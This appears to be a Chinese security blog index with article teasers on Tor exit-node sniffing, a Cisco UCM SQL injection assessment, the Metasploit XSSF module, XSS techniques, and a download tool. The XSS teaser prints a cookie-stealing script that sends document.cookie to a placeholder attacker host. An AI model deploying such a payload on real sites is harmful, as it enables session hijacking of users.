如今俄罗斯黑客,通过入侵Tor匿名网络的一些边缘节点,便可以监听到用户的数据流量。他们对facebook相关的流量数据格外感兴趣。 Tor是一个可以让你匿名上网的免费软件,它把请求加密并在大量计算机之间传送之后,再通过出口节点解密请求并发送到目标地址,通常这些出口节点有上千个之多。 这些成千上万的节 ... 全文 »
一次非常规 SQL 注入(informix-sql)的利用过程:
介绍
一个客户正在寻找升级他们的思科 UCM 软件,并希望保证他们的实现是安全配置的。 在评估期间,我们在 Cisco UCM 管理员门户中发现了一个经过身份验证的 SQL 注入问题。 在大多数情况下,可以使用 SQLMap 或其他工具来自动发现问题。
由于我们是在客户端的开发环境中进行测试的,所以我们被允许对 Cisco UCM 执行更积极的攻击。 我最初使用的 SQLMap 命令如 ... 全文 »
在看《Metasploit渗透测试魔鬼训练营》的时候讲的XSSF模块的使用,感觉这个模块很神奇,原理虽然不知道但是觉得应该让大家的Metasploit都添加上这个模块,以备不时之需,本文目的仅仅是分享一下XSSF这个工具的安装和使用方法。 KALI Llinux安装方法: 安装最新的KALI Linux,现 ... 全文 »
在早期 , 对于xss我们是这样利用的 <script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script> 将 cookie之类的数据传递到自己的服务端 但是 如果要更为复杂的攻击的话,由于字符串长度等 ... 全文 »
这是一个我最近写的项目,它是一个下载工具,多协议下载引擎,目前支持HTTP\HTTPS\FTP、粘贴板监控,采用多线程多任务方式进行下载.为什么要开源它?按照目前的状况来看,这个项目的代码写的不是很满意,下载接口不是很清晰,不方便扩展后续功能,就是这些原因;当然我有准备重写一份.以下是该项目部分截图,项目源代码在附件下 ... 全文 »